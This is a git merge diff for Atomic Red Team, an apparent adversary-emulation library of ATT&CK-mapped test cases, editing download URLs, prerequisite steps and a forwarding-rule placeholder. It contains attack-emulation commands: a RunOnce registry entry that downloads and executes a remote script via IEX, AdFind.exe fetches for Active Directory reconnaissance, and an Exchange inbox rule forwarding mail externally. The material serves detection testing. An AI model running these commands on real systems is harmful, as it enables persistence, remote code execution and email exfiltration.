Merge branch 'master' into gk-atomic-red-team-T1136.003-Azure-CLI

2023-03-13 20:41:10 +00:00
parent c0b144a44a d26d95d3f7
commit 8a6b82d185
18 changed files with 142 additions and 88 deletions
@@ -37161,7 +37161,7 @@ privilege-escalation:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -37211,7 +37211,8 @@ privilege-escalation:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -60101,7 +60102,7 @@ persistence:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -60151,7 +60152,8 @@ persistence:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -70043,7 +70045,7 @@ collection:
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
          Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
        cleanup_command: |
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -84801,10 +84803,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
          lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -84830,10 +84831,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc admincountdmp\n"
        name: command_prompt
@@ -84857,10 +84857,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=person)\n"
        name: command_prompt
@@ -84884,10 +84883,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc exchaddresses\n"
        name: command_prompt
@@ -85729,6 +85727,7 @@ discovery:
          '
        get_prereq_command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -87951,10 +87950,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=subnet)\n"
        name: command_prompt
@@ -88244,10 +88242,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
        name: command_prompt
@@ -88271,10 +88268,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -gcb -sc trustdmp\n"
        name: command_prompt
@@ -90527,10 +90523,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=computer)\n"
        name: command_prompt
@@ -90554,10 +90549,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc dclist\n"
        name: command_prompt
@@ -42069,7 +42069,7 @@ collection:
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
          Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
        cleanup_command: |
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -33011,7 +33011,7 @@ privilege-escalation:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -33061,7 +33061,8 @@ privilege-escalation:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -53421,7 +53422,7 @@ persistence:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -53471,7 +53472,8 @@ persistence:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -74088,10 +74090,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
          lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -74117,10 +74118,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc admincountdmp\n"
        name: command_prompt
@@ -74144,10 +74144,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=person)\n"
        name: command_prompt
@@ -74171,10 +74170,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc exchaddresses\n"
        name: command_prompt
@@ -74842,6 +74840,7 @@ discovery:
          '
        get_prereq_command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -76343,10 +76342,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=subnet)\n"
        name: command_prompt
@@ -76616,10 +76614,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
        name: command_prompt
@@ -76643,10 +76640,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -gcb -sc trustdmp\n"
        name: command_prompt
@@ -78428,10 +78424,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=computer)\n"
        name: command_prompt
@@ -78455,10 +78450,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc dclist\n"
        name: command_prompt
@@ -288,6 +288,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -149,6 +149,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -433,6 +433,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -479,6 +480,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -210,6 +210,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -234,6 +235,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -312,6 +312,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -128,6 +128,7 @@ atomic_tests:
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -224,6 +224,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -270,6 +271,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -316,6 +318,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -362,6 +365,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -86,6 +86,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -110,6 +111,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -134,6 +136,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -158,6 +161,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -39,7 +39,7 @@ Creates a new Inbox Rule to forward emails to an external user via the "ForwardT
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
-New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
 ```

 #### Cleanup Commands:
@@ -40,7 +40,7 @@ atomic_tests:
      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
      Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
    cleanup_command: |
      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -187,6 +187,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -233,6 +234,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```

@@ -81,6 +81,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -105,6 +106,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
    get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
  executor:
    command: |
@@ -180,7 +180,7 @@ Upon successful execution, a new entry will be added to the runonce item in the

 ```powershell
 $RunOnceKey = "#{reg_key_path}"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
 ```

 #### Cleanup Commands:
@@ -273,7 +273,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
 <br/>

 ## Atomic Test #6 - Suspicious bat file run from startup Folder
-bat files can be placed in and executed from the startup folder to maintain persistance.
+bat files can be placed in and executed from the startup folder to maintain persistance
+
 Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
 folder and will also run when the computer is restarted and the user logs in.

@@ -59,7 +59,7 @@ atomic_tests:
  executor:
    command: |
      $RunOnceKey = "#{reg_key_path}"
-      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
